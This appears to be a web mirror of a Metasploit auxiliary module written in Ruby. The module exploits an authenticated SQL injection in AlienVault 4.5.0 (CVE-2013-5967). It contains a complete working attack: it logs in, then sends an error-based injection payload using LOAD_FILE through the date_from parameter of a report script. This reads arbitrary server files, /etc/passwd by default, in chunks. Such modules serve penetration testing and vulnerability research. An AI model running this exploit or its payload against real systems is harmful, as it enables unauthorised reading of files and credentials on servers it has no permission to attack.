Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/alienvault_iso27001_sqli.rb
33761 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",

14
        'Description' => %q{

15
          AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG

16
          generation PHP file. This module exploits this to read an arbitrary file from

17
          the file system. Any authenticated user is able to exploit it, as administrator

18
          privileges aren't required.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module

23
        ],

24
        'References' => [

25
          ['CVE', '2013-5967'],

26
          ['EDB', '32644']

27
        ],

28
        'DefaultOptions' => {

29
          'SSL' => true

30
        },

31
        'Platform' => ['linux'],

32
        'Privileged' => false,

33
        'DisclosureDate' => '2014-03-30',

34
        'Notes' => {

35
          'Reliability' => UNKNOWN_RELIABILITY,

36
          'Stability' => UNKNOWN_STABILITY,

37
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        Opt::RPORT(443),

45
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),

46
        OptString.new('USERNAME', [ true, 'Single username' ]),

47
        OptString.new('PASSWORD', [ true, 'Single password' ]),

48
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])

49
      ]

50
    )

51
  end

52


53
  def run

54
    print_status("Get a valid session cookie...")

55
    res = send_request_cgi({

56
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')

57
    })

58


59
    unless res and res.code == 200

60
      print_error("Server did not respond in an expected way")

61
      return

62
    end

63


64
    cookie = res.get_cookies

65


66
    if cookie.blank?

67
      print_error("Could not retrieve a cookie")

68
      return

69
    end

70


71
    post = {

72
      'embed' => '',

73
      'bookmark_string' => '',

74
      'user' => datastore['USERNAME'],

75
      'passu' => datastore['PASSWORD'],

76
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])

77
    }

78


79
    print_status("Login...")

80


81
    res = send_request_cgi({

82
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),

83
      'method' => 'POST',

84
      'vars_post' => post,

85
      'cookie' => cookie

86
    })

87


88
    unless res and res.code == 302

89
      print_error("Server did not respond in an expected way")

90
      return

91
    end

92


93
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')

94
      print_error("Authentication failed")

95
      return

96
    end

97


98
    cookie = res.get_cookies

99


100
    if cookie.blank?

101
      print_error("Could not retrieve the authenticated cookie")

102
      return

103
    end

104


105
    i = 0

106
    full = ''

107
    filename = datastore['FILEPATH'].unpack("H*")[0]

108
    left_marker = Rex::Text.rand_text_alpha(6)

109
    right_marker = Rex::Text.rand_text_alpha(6)

110


111
    print_status("Exploiting SQLi...")

112


113
    loop do

114
      file = sqli(left_marker, right_marker, i, cookie, filename)

115
      return if file.nil?

116
      break if file.empty?

117


118
      str = [file].pack("H*")

119
      full << str

120
      vprint_status(str)

121


122
      i = i + 1

123
    end

124


125
    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])

126
    print_good("File stored at path: " + path)

127
  end

128


129
  def sqli(left_marker, right_marker, i, cookie, filename)

130
    pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"

131
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"

132
    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"

133
    pay << " GROUP BY x)a) AND 'xnDa'='xnDa"

134


135
    get = {

136
      'date_from' => pay,

137
      'date_to' => '2014-03-30'

138
    }

139


140
    res = send_request_cgi({

141
      'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),

142
      'cookie' => cookie,

143
      'vars_get' => get

144
    })

145


146
    if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/

147
      return $1

148
    else

149
      print_error("Server did not respond in an expected way")

150
      return nil

151
    end

152
  end

153
end

154


155